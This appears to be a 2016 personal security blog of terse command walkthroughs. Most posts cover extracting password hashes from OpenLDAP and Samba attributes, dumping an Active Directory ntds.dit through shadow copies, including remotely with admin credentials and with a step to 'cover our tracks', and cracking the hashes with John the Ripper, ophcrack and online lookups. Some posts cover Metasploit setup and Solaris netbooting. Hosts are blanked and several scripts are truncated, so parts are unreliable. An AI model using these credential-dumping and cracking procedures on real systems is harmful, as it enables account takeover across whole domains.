Monday, October 31, 2016

LDAP crypt password extraction

 if your passwords are crypt...  
 ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w badpassword \  
 -h -b "dc=my,dc=pants,dc=com" \  
 -LLL -v "" uid userPassword \  
 | ldap2pw >  
 #! /usr/bin/perl -w  
 use strict;  
 use MIME::Base64;  
 while( <> && ! eof) {  # need eof since we will hit eof on the other <> chomp;  
    my( $uid, $passw, $cn, $dn );  
    $cn = $uid = '';  
    while( <> ) {  # get an object  
     last if /^\s*$/;   # object have blank lines between then  
     if( /^cn: (.+)/ ) {  
       $cn = $1;  
     }  elsif( /^dn: (.+)/ ) {  
       $dn = $1;  
     }  elsif( /^userP\w+:: (.+)/) {  
       $passw = substr( decode_base64($1), 7);  # assuming {crypt}  
     }  elsif( /^uid: (.+)/) {  
       $uid = $1;  
    print "$uid\:$passw\n" if defined $passw; # only output if object has password  

LDAP base64 conversion for cracking

 ldif and ldap password extraction  
 when you extract passwords from ldap, they're salted.  
 you need to convert them to their hashes.  
 why? well. because of RFC2307  
   userpasswordvalue = cleartext-password / prefix b64-hashandsalt  
   prefix    = "{" scheme "}"  
   scheme = %x30-39 / %x41-5A / %x61-7a / %x2D-2F / %x5F  
      ;0-9, A-Z, a-z, "-", ".", "/", or "_"  
   b64-hashandsalt = <base64 of hashandsalt>  
   hashandsalt = password-hash salt  
   password-hash = <digest of cleartext-password salt>  
   cleartext-password = %x00-FF  
   salt = %x00-FF  
 yes. that.  

 in a previous post i've already mentioned how to extract uids  
 and passwords into a nice long list for jtr...  
 you'll need python and the script below which will convert the list  
 line by line. it'll work for base64 passwords:  
 MD5, SHA, SHA1, SSHA, SHA256, SSHA256, &c.   
 first, do some text preparation:  
 # cut -d ":" -f1 userpassword.out > userpassword.left  
 # cut -d ":" -f2 userpassword.out > userpassword.base64  

 import binascii  
 import base64  
 import sys  
 #read in lines - and decode  
 for x in f.xreadlines():  
     print binascii.hexlify(base64.b64decode(x))  
     print "Error: "+x  
 # ./ userpassword.base64 > userpassword.right  
 # paste -d : userpassword.left userpassword.right > userpassword.out  
 and if you can't figure out what is want in terms of hashes, use hash-identifier for singletons.
 use hashid for lists.
 # hashid userpassword.right -o userpassword.hashid
 after base64 conversion, of course.  

Wednesday, October 26, 2016

LDAP attributes for password extraction

 for ldap attribute extraction the following are key:  
 Filter: (objectClass=*)  
 Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword  
 i have access to an openldap server. yes!  
 the search DN is:  
 valid user accounts are kept:  
 retired user accounts are kept:  

 let's grab passwords...
 ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword /  
 -h -b "dc=my,dc=pants,dc=com" -LLL /  
 -v "(objectClass=*)" sambaLMPassword > lmpassword
 i know that all valid accounts have this format:  
 dn: uid=username  
 some places have a different dn: than the valid logon id.  
 those can be simply the attribute uid=username  
 my script below is to slice and dice "dn: uid="  
 when doing the ldap dump, however, attributes may be juggled. more advanced  
 text sorting is required for proper formatting... i digress.  
 cp $lmorig $lm  
 cp $lmorig $lm  
 sed -i '/ou=groups/d' $dump                         <-- remove groups as dumped  
 sed -i '/sambaDomainName/d' $dump                   <-- there are no passes for me here  
 sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump               <-- admin has cn: as do others  
 sed -i '/^$/d' $dump                                <-- blank lines be gone  
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn  
 sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump  <-- removing dangling dn  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  <-- stripping dn  
 sed -i 's/,dc=my,dc=pants,dc=com//g' $dump          <-- removing dangling dn  
 sed -i '/dc=my/d' $dump                             <-- removing dangling dn  
 sed -i 's/dn:\ uid=//g' $dump                       <-- we only want uid  
 sed -i '/dn:\ /d' $dump                             <-- for records that only have leadinf dn:  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump               <-- fun with line breaks  
 sed -i 's/userPassword::/userPassword:/g' $dump     <-- converting attribite. some are :: others :  
 sed -i 's/userPassword//g' $dump                    <-- remove the strip altgother. once : remains  
 sed -i 's/blast:\ /:/g' $dump                       <-- fun  
 sed -i 's/blast/\n/g' $dump                         <-- convert fun to a new line  
 sed -i '/:/!d' $dump                                <-- no : ? go away  
 sed -i '/^:/d' $dump                                <-- start with : ? go away
 sed -i 's/=//g' $dump                               <-- remove trailing =  
 sort -u $dump > $dump.out                        <-- sort the output  
 rm $dump                                            <-- remove temp file  
for LMPassword it is a little simpler. NTPassword is the same; replace the LMPassword attribute for file processing.
 cp $dumporig $dump  
 sed -i '/ou=groups/d' $dump  
 sed -i '/sambaDomainName/d' $dump  
 sed -i '/dn:\ cn=/d' $dump  
 sed -i '/^$/d' $dump  
 sed -i '/^uid:\ /d' $dump                       <-- removing uid if we dumped it   
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  
 sed -i '/dc=my/d' $dump  
 sed -i 's/dn:\ uid=//g' $dump  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump  
 sed -i 's/sambaLMPassword//g' $dump  
 sed -i 's/blast:\ /:/g' $dump  
 sed -i 's/blast/\n/g' $dump  
 sed -i '/:/!d' $dump  
 sort -u $dump > $dump.out  
 rm $dump  
 but... what is rootdn's password for to access the openldap server?  
 it is found here:  
 scroll down to:  
 another account worth checking is replicator, but  
 it may be restricted to certain hosts.  
 rootdn "cn=admin,dc=my,dc=pants,dc=com"  
 overlay syncprov  
 syncprov-checkpoint 100 10  
 syncprov-sessionlog 100  
 rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p  
 crack that password by placing the following in a text file, say slap.out:  
 /opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out  
 * note: --format=salted-sha1-opencl may barf:  
 Build log: ptxas error  : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)  
 it is only one password...  
 if you are are able to grab an ldif, things are way easier.  
 sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out  
 this has you searching for the strings "dn:" and "Password" and printing their lines out in that  
 order to an output file.  
 easy. then you parse away.  

password cracking post john

 post and john...   
 let's say you've cracked away and can't crack the hash.
 someone may already have for you.

 findmyhash is an automated way to search online databases:  
 # findmyhash TYPE -h "hash" -g (searches the Google)
 Do a batch job because you don't want to copy and paste
 your life away (no Google, sorry):  
 # findmyhash TYPE -f FILE   


 that's useful, but doing things with a file is the way to go.

 here's how to create a file with post-cracked john LANMAN  
 passes... the below shows what's left, does some formatting, 
 removes the first couple of fields, and dumps the type of password.  
 # john --show=LEFT --format=lm lmhash.out | grep -v "password hashes" | \  
 cut -d":" -f3 | sort -u > lmhash.only && sed -i 's/\$LM\$//g' lmhash.only  
 however, the findmyhash man pages state that for LANMAN/NT hashes  
 having both hashes is best. ohpc format does this for us... 
 ophcrack files are formatted thus:
 1  23      4      5   67  
 we want columns 3 and 4.  
 note: not all active directory accounts have a stored LANMAN password. crud. 
 that's why we're using sed to remove the leading : . joy.  
 # cat nthash.oph | cut -d":" -f3,4 | sort -u > nthash.only && sed -i 's/^://' nthash.only 
 now plug it in:  
 # findmyhash LM -f nthash.only  
 yay! our passwords are all over the internets. who knew?

 a cracking interlude...

 passwords found in LDAP databases can be challenging.  
 Type can be any number of type: MD5, CRYPT, DES, NT, LANMAN  
 gross. just gross. but... if the passwords you're accessing are 
 from an LDAP-Samba database, get at one of those passwords and 
 you're golden. figuring out the hash type can be challenging.
 hash-identifier may be of use.
 # hash-identifier  
 place hash on HASH: line  

 and then you can use the same format as above with findmyhash.
 only, specify MD5, CRYPT...

Monday, October 24, 2016

ophcrack and jtr coexisting notes

 when using ophcrack and do not specify lmhash as will   
 place the lmhashes and nthashes in the same file for use by ophcrack.  
 python ~/ntdsxtract/ ~/domain.export/datatable.3 ~/domain.export/link_table.4 ~/temp \  
 --passwordhistory --passwordhashes --ntoutfile ~/domain.oph/domain-nthash.oph --pwdformat ophc --syshive ~/broadway/system  
 when running ophcrack via a cracking rig, here's the format:  
 # ophcrack -v -g -u -n 7 -l ~/oph/domain-nthash.log -o ~/oph/domain-nthash.cracked -d /usr/share/ophcrack/ \  
  -t vista_free:vista_proba_free:xp_free_fast:xp_german:vista_num:vista_special:xp_free_small \  
  -f ~/oph/domain-nthash.oph  
 -l log of work  
 -o cracked passwords. this is basically the oph file with the lanman and nt passes appended at the end.  
 -d location of rainbow tables  
 -t are the rainbow table directories  
 -f the oph hash file  
 let's say you've already run your grabbed hashes through john and want to crack the  
 leftovers via ophcrack.  
 # ./john --show=LEFT --format=nt nthash.out | grep -v "password hashes" | cut -d":" -f1,2 | \  
 sort -u > domain-nthash.sort && sed -i 's/:/::/g' domain-nthash.sort  
 # sort -u domain-nthash.oph > domain-nthash.oph-sort && mv domain-nthash.oph-sort domain-nthash.oph  
 # gawk -F:: '  
    FNR==NR {a[NR]=$1; next};  
    END{for (i in a) if (a[i] in b) print b[a[i]]}  
  ' domain-nthash.sort domain-nthash.oph | sort -u > domain-nthash.oph.sort-new && mv domain-nthash.oph  

Friday, October 21, 2016

jtr and wordlists notes

 # ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >> dictionaries/local-upper.lst  
 # cat local-upper.lst >> local.lst  
 if you're cracking des or nt or pretty much anything that is not solely uppercase
 and want to eventually feed it into lm brute forcing: 
 # dd if=dictionaries/local.lst of=dictionaries/local-upper.lst conv=ucase  

Thursday, October 20, 2016

dumping ad passwords and cracking with jtr

yes, some people use the euphemism "windows domain controller password audit." but, let's call it what it is: dumping ad and getting password hashes. i'm using jtr.
 on a domain Controller using a privileged account:  
 C:\ vssadmin list shadows  
 none. okay.  
 * where's ntds.dit ? take note.  
 * make a system dir  
 C:\ mkdir C:\Windows\system  
 * make a shadow copy of C:\  
 * C:\ vssadmin create shadow /for=C:  
 you should see:  
 Successly create shadow for 'C:\'  
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
 Successfully created shadow copy for 'C:\'  
   Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
   Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
 * C:\Users\administrator>vssadmin list shadows  
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
 Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}  
   Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM  
    Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
      Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\  
      Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
      Originating Machine: domain-dc1.domain  
      Service Machine: domain-dc1.domain  
      Provider: 'Microsoft Software Shadow Copy provider 1.0'  
      Type: ClientAccessible  
      Attributes: Persistent, Client-accessible, No auto release, No writers,  
 * next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.  
 that would be from the shadow volume NTDS location to, say, C:\  
 C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo  
 py1\Windows\NTDS\ntds.dit C:\  
     1 file(s) copied.  
 * copy SYSTEM hive  
 C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo  
 py1\Windows\System32\config\SYSTEM C:\  
     1 file(s) copied.  
 * let's cover our tracks and prevent others from grabbing dit and SYSTEM
 C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250 

 a linux interlude... if you have admin creds
 and do not have access to a console and do
 not want to have access to a console
 # mount -t cifs //$ -o username=domain/administrator,password=weakpassword /root/mnt 
 # apt-get intall wmis
 # wmis -U DOMAIN/administrator%weakpassword // "cmd.exe /c
 vssadmin list shadows > c:\output.txt"
 # cat /root/mnt/output.txt
 look for ShadowsCopy that is where you'll find ntds.dit and SYSTEM

 # wmis -U DOMAIN/administrator%weakpassword // "cmd.exe /c
 copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
 # wmis -U DOMAIN/administrator%weakpassword // "cmd.exe /c
 copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"

 # ls /mnt
 ntds.dit SYSTEM 
 linux ubuntu/debian rig
 install base packages:
 # apt-get install cifs-utils autoconf automake autopoint libtool pkg-config  
 offline processing tools:  
 # git clone  
 # cd libesedb/  
 # ./  
 # ./  
 # ./configure  
 # make && make install  
 # ldconfig <- load library  
 # git clone  
 # get clone  
 get cracking!  
 # mount -t cifs //$ -o username=domain/administrator,password=weakpassword /root/mnt  
 # mkdir domain 
 # cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/  
 # cd ~/libesedb/esedbtools  
 # ./esedbexport -t ~/ntds ~/ntds.dit  
 # ~/libesedb/esedbtools# ./esedbexport -t ~/domain ~/domain/ntds.dit  
 esedbexport 20160924  
 Opening file.  
 Exporting table 1 (MSysObjects) out of 12.  
 Exporting table 2 (MSysObjectsShadow) out of 12.  
 Exporting table 3 (MSysUnicodeFixupVer2) out of 12.  
 Exporting table 4 (datatable) out of 12.  
 Exporting table 5 (hiddentable) out of 12.  
 Exporting table 6 (link_table) out of 12.  
 Exporting table 7 (sdpropcounttable) out of 12.  
 Exporting table 8 (sdproptable) out of 12.  
 Exporting table 9 (sd_table) out of 12.  
 Exporting table 10 (MSysDefrag2) out of 12.  
 Exporting table 11 (quota_table) out of 12.  
 Exporting table 12 (quota_rebuild_progress_table) out of 12.  
 Export completed.  
 # ls ~/domain.export  
 datatable.3      <- accounts
 link_table.5     <- db links
 # python ntdsxtract/ ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM  

 what does that mean?
 command accounttable linkstable whereworkisdone wewantthemall wewanthashes wheretosendlmhash wheretosendnthash hashformat systemhive
 [+] Started at: Thu, 20 Oct 2016 17:47:21 UTC  
 [+] Started with options:  
     [-] Extracting password hashes  
     [-] LM hash output filename: /root/domain/lmhash.out  
     [-] NT hash output filename: /root/domain/nthash.out  
     [-] Hash output format: john  
 The directory (/root/temp) specified does not exists!  
 Would you like to create it? [Y/N]  
 # ls ~/domain/  
 * feed into jtr and use cracked passes to compose a wordlist suitable for nt format  
 # ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out  
 note: lm is not compatible with gpu cracking  
 # ./john --show lmhast.out  
 # ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt  
 # ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out  

solaris 11 default passwords

 from oracle support:  
 On Solaris 11 the default account for the system is (login/password): jack/jack and for the system account root/solaris ; please keep in mind that on Solaris 11 you can't longer login directly with the root account.  
 well. that's nice. that means jack, right?

Friday, October 14, 2016

dump and crack nis/nis+ password database

yeah well. that was easy.
 # ypcat passwd > <file>  
 # john <file>  
 # john --show <file>  

Thursday, October 13, 2016

afterthefact postgre metasploit user password set

 let's just say you set up metaspoit with msf user and forget to set the password.  
 you go to msfconsole and see:  

 Failed to connect to the database: fe_sendauth: no password supplied [-] Unknown command: Failed. metasploit  

 $ sudo -u postgres psql  
 \password msf  
 set the password and quit  
 $ sudo nano -w /opt/metasploit-framework/config/database.yml  
 On the line password: supply it.  
 $ echo sigh.  

let's crack default factory-shipped hp ilo passwords with john

let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
 # mkdir -p /opt/john/dictionaries  
 # cd /opt/john/dictionaries
 # crunch 8 8 0123456789 > eightnum.lst <- 890M
 # crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst <- 1T
 # ./john --session=ipmi32 --fork=8 --format=rakp \
 --wordlist=/opt/john/dictionaries/eightnum.lst out.john  

let's do it with both wordlists.
# ls /opt/john/dictionaries/ | xargs -t -I files \  
 ./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \  
 --fork=8 --format=rakp out.john  
 now you can let it run against all the numbers and all the alpha. 
 --rules will do crazy upper and lower case (just in case).   
although. you may forego using wordlists altogether if you're
doing simple alpha or num cracks.
  go to /opt/john/john.conf and add the following stanza:  
 File = $JOHN/upper.chr  
 MinLen = 8  
 MaxLen = 8  
 CharCount = 26  
that uses john's uppercase alphabet chr and parses through all 8 combinations of 26 letters.  
it may take forever, but, yay.  
 # ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john  

here's something for hp's default random 8 character string of 10 digits:

 File = $JOHN/upper.chr
 MinLen = 8
 MaxLen = 8
 CharCount = 10

 # ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john  

for gpu cracking

first, always check how many gpus you have available  
 # nvida-smi  
 0, 1 under the GPU heading means you have two.  
 when passing the command line options to john,  
 get cracking:  
 # ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john  
 * this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are   
 forking the cracking job between the two of them.  
 Using default input encoding: UTF-8  
 Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])  
 Remaining 116 password hashes with 116 different salts  
 Node numbers 1-2 of 2 (fork)  
 Device 1@crackingrig: Quadro NVS 295  
 Device 0@crackingrig: Quadro NVS 295  
 Press 'q' or Ctrl-C to abort, almost any other key for status  
 * if you press <enter> <enter>  
 2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor  
 1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie  
 you'll see something similar to the above. notice that the GPU is not frying.  
 * nb the idea of cores does not apply to gpus, so stick to fork=2 or you might  
  have a really bad day. really. pay no attention to --list=cuda-devices and seeing:  
  Number of stream processors:  8 (1 x 8)   
  and that thought that it means --fork=8 per processor.   
  here're some numbers to dissuade you for brute-force processing:  
  0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212  
  2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632  
  4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905  
  8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691   
 16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s  3556p/s  3556c/s  3556C/s GPU:80°C A-214..Administrtor214  

Tuesday, October 11, 2016

soup to nuts install of metasploit on ubuntu 14.04 lts

soup to nuts install of metasploit on ubuntu 14.04 lts
 install base  
 * priv  
 nano -w /etc/ssh/sshd_config  
 ssh-keygen -t rsa -b 2048  
 apt-get update  
 apt-get upgrade  
 apt-get install build-essential libreadline-dev libssl-dev libpq5 \  
 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre \  
 git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev \  
 libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ipmitool p7zip \  
 nmap tcpdump subversion cmake bison flex 
 * non-priv  
 cd ~  
 git clone git:// .rbenv  
 echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc  
 echo 'eval "$(rbenv init -)"' >> ~/.bashrc  
 exec $SHELL  
 git clone git:// ~/.rbenv/plugins/ruby-build  
 echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc  
 git clone git:// ~/.rbenv/plugins/rbenv-sudo  
 exec $SHELL  
 rbenv install 2.3.1  
 rbenv global 2.3.1  
 ruby -v  
 postgre sql server  
 * non-priv  
 sudo -s  
 su postgres  
 cd ~  
 createuser msf -P -S -R -D  
 createdb -O msf msf  
 hashcat  (not a hot idea on a virtual machine)
 * as priv user  
 sudo apt-get install ocl-icd-libopencl1 opencl-headers clinfo  
 sudo mkdir /usr/bin/OpenCL  
 cd /opt  
 p7zip -d hashcat-3.10.7z  
 mv hashcat-3.10/ hashcat  
 cd hashcat  
 cp hashcat64.bin /usr/bin  
 ln -s /usr/bin/hashcat64.bin /usr/bin/hashcat  
 * as priv user  
 apt-get install build-essential libssl-dev yasm libgmp-dev \
 libpcap-dev libnss3-dev libkrb5-dev pkg-config libbz2-dev \
 nvidia-cuda-toolkit nvidia-opencl-dev nvidia-352 nvidia-cuda-toolkit opencl-headers <- if you have an nvidia gpu 
 fglrx-updates-dev <- if you want to use your amd gpu as an opencl device
 libopenmpi-dev openmpi-bin <- for mpi support

 * a gpu note
 lshw -C video
 apt-get install libboost-regex1.54-dev <- meh
 svn checkout rexgen
 cd rexgen/trunk/src/
 mkdir build && cd build
 cmake ..
 make  && sudo make install 

 git clone git:// -b bleeding-jumbo john 
 cd john/src 

 ./configure --enable-mpi --enable-nt-full-unicode && make -s clean && make -sj4 
 * because unicode, yes.

 ./configure --enable-cuda --enable-mpi --enable-nt-full-unicode \
 --enable-experimental-code && make -s clean && make -sj4
 * if gpu
 cd .. && mv run /opt/john 

 ** test gpu
 john --list=cuda-devices
 john --list=opencl-devices
 let's get some password lists

 cd /opt/john
 mkdir /opt/john/dictionaries
 cd /opt/john/dictionaries
 cp .. /wordlist.lst .
 wget .
 wget .
 * nb crackstation may show up as a binary file. i'd suggest after extraction:
 strings crackstation-human-only.lst > crackstation.txt

 fix the environment
 add /opt/john to PATH
 add line JOHN="/opt/john/"

 ** odds and sods
 john --list=formats --format=opencl
 john --list=formats --format=cuda

 john ~/shadow <- openmp crack session
 john --format=sha512crypt-opencl ~/shadow <- opencl session
 john --format=sha512crypt-cuda ~/shadow <- cuda session 
 ** add'l chr files
 * nb

 * priv user  
 wget -O crunch-3.6.tgz  
 tar xvfz crunch-3.6.tgz  
 make install  
 * non-priv  
 cd /opt  
 sudo git clone  
 sudo chown -R `whoami` /opt/metasploit-framework  
 cd metasploit-framework  
 gem install bundler  
 bundle install  
 sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'  
 armitage (metasploit gui)  
 * priv  
 curl -# -o /tmp/armitage.tgz  
 sudo tar -xvzf /tmp/armitage.tgz -C /opt  
 sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage  
 sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver  
 sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"  
 sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver  
 sudo nano /opt/metasploit-framework/config/database.yml  
  adapter: postgresql  
  database: msf  
  username: msf  
  port: 5432  
  pool: 75  
  timeout: 5  
 sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"  
 source /etc/profile  
 run it  
 * non-priv  

Thursday, October 6, 2016

remove solaris 8 jumpstart services from a solaris 8 jumpstart server

 yucky gross solaris 8 jumpstart server begone!  
 # grep -v "^#" /etc/inetd.conf <- shows what is defined.  
 hashed finger, tftp, &c in /etc/inetd.conf  
 # pkill -HUP inetd  
 bash-2.03# rm /etc/ethers  
 bash-2.03# rm /etc/bootparams  
 bash-2.03# rm -rf /tftpboot  
 bash-2.03# rm -rf /jumpstart  
 # ptree   
 to determine if bootparamd is forked (saw entiries in rpcinfo -p)  
 443  /usr/sbin/rpc.bootparamd  
 441  /usr/sbin/in.rarpd -a  
 looked for rarp in /etc/rc2.d ... then all of /etc   
 # find . -type f -exec grep -l "rarp" {} +  
 found it... "*nfs.server"  
 hashed out rard & bootparamd lines  
     # If /tftpboot exists become a boot server  
 #    if [ -d /tftpboot ]; then  
 #        /usr/sbin/in.rarpd -a  
 #        /usr/sbin/rpc.bootparamd  
 #    fi  

Monday, October 3, 2016

netboot solaris 10 via ubuntu 14 using RARP

 I did something bad and my Sun T1000 decided to stop booting due to the most 
recent patchset.  
 Luckily ALOM was installed and I could ssh in and see:  
 Cross trap sync timeout: at cpu_sync.xword[1]: 0x1010  
 Flow across the console.  
 This is firmware issue as:  
 sc> showhost  
 SPARC-Enterprise-T1000 System Firmware 6.3.10 2007/12/08 15:48  
 Host flash versions:  
   Hypervisor 1.3.4 2007/03/28 06:03  
   OBP 4.25.11 2007/12/07 23:44  
   POST 4.25.11 2007/12/08 00:10   
 The patchset is for 6.4. Of course.  
 Happily the T1000 lacks an optical drive nor any means of connecting one. 
No USB either Great.  
 The next option was to do a network boot. Oh boy.  
 I didn't feel like messing with my production Solaris systems, so I installed Ubuntu 14 
 with all the preqs for an old-stype Jumpstart server:  
 * TFTP  
 * Bootparamd  
 * NFSv4  
 * RARP  
 * Solaris 10 SPARC DVD (here: /opt/sol-10-u9-sparc.iso)  
 * Solaris Firmware 6.7.13 patch 139435-10 (here: /opt/solaris10.patches/  
 The reason why I am doing RARP is due to the fact that my network already 
 has a DHCPvM$ server.  
 RARP uses reverse ARP to receive its IP address. So, by sending out RARP packets, my 
 Solaris system is able to get an address and not rely on DHCP. Neat? Yeah.  
 My systems for this exercise are:  
 0A6120A6 (IP as hex)  
 # apt-get install rarpd tftpd-hpa bootparamd nfs-kernel-server  
 # vi /etc/default/rarpd  
 Change the last line to match the tftpd-hpa directory and the NIC name:  
 OPTS="-v -b /var/lib/tftpboot/ eth0"  
 iso mount:  
 # mount -o loop /opt/sol-10-u9-sparc.iso /media/solaris10/  
 # mkdir -p /media/solaris10  
 # mkdir -p /opt/solaris10.patches  
 Define a share in NFS for this mount point as this mount will be used to serve 
 the patches. Open the following file:  
 # vi /etc/exports  
 Add the following entries:  
 /media/solaris10/ *(insecure,rw,no_root_squash,no_subtree_check,sync)  
 /opt/solaris10.patches/ *(insecure,rw,no_root_squash,no_subtree_check,sync)  
 # vi /etc/bootparams  
 sunfire root=netboot:/media/solaris10/Solaris_10/Tools/Boot install=netboot:/media/solaris10 boottype=:in  
 per URL: Some explanation for the above: This defines which host gets the specified 
 NFS share. NFS4 uses relative pathnames, but I am not using this, so therefore I’ve 
 specified the absolute path. Note that server: is the hostname of the server running 
 the NFS service and was mentioned in my post earlier as my server is originally named 
 "netboot". The name used is the hostname of your server, substitute it to the correct name.  
 # vi /etc/hosts  
 Add the following entry: hostnix01  
 Create the ethers file:  
 vi /etc/ethers  
 Add the following entry:  
 00:14:4f:e5:f7:9a hostnix01  
 per URL: Replace the MAC address with the MAC of your Sun server. You can change the 
 hostname as well, but needs to be the same everywhere!  
 vi /etc/default/tftpd-hpa  
 Change the TFTP_ADDRESS line to the following:  
 per URL: The configuration of the server is now complete One last step we need to do is 
 to copy the netboot kernel for the Sun server. This resides on the mounted Solaris 
 install image. By default OpenBoot will look for a kernel using TFTP when using network 
 boot. Based on it’s IP-address it will look for a matching HEX filename. We can find out 
 which filename that would be by running the following:  
 # printf "%02X%02X%02X%02X" 10 97 32 166  
 This will result in the following (for my IP-address):  
 The above will be the netboot kernel for the Sun server. Place the netboot kernel in place:  
 # cp /media/solaris10/Solaris_10/Tools/Boot/platform/sun4u/inetboot /var/lib/tftpboot/C0A800E6  
 restart the services in order  
 service tftpd-hpa restart  
 service bootparamd restart  
 service nfs-kernel-server restart  
 service rarpd restart  
 # ssh admin@hostnix01-alom (remote management shell)  
 sc> poweron  
 sc> console -f  
 When you see mac address, get into openboot  
 sc> break -y  
 Switch back to console and netboot the kernel  
 sc> console -f  
 ok > boot net:rarp -avs  
 * interactive, verbose, single user mode (does not include install flag)  
 After waiting next to forever...  
 # mkdir /tmp/mount  
 # mount -F nfs /tmp/mount  
 # cd /tmp/mount  
 # unzip  
 # cd 139435-10  
 # ./sysfwdownload /pwd/patch.bin  
 Run patching command via sysfwdownload. If you see:  
 "sysfwdownload: file could not be opened"  
 that means the installer requires the full path; e.g.:  
 # ./sysfwdownload Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin   
  .......... (10%).......... (20%).......... (30%).......... (41%)..........    
  (51%).......... (61%).......... (71%).......... (82%).......... (92%)........ (100%)   
  Download completed successfully   
  # init 0   
 Now you should be back at the 'ok' prompt. Now on the ALOM:  
 sc> poweroff   
 SC Alert: SC Request to Power Off Host.   
 SC Alert: Host system has shut down.   
 sc> setkeyswitch -y normal   
 sc> flashupdate -s   
 sc> resetsc   
 Your ssh console will be terminated due to a broken pipe.  
 ssh back in and issue:  
 sc> poweron  
 sc> console -f  
 And you're back!  
 SPARC Enterprise T1000, No Keyboard  
 Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.  
 OpenBoot 4.30.4.e, 3968 MB memory available, Serial #82179994.  
 Ethernet address 0:14:4f:e5:f7:9a, Host ID: 84e5f79a.  
 Boot device: disk File and args:  
 Loading: /platform/SUNW,SPARC-Enterprise-T1000/boot_archive  
 ramdisk-root hsfs-file-system  
 Loading: /platform/SUNW,SPARC-Enterprise-T1000/kernel/sparcv9/unix  
 SunOS Release 5.10 Version Generic_150400-38 64-bit  
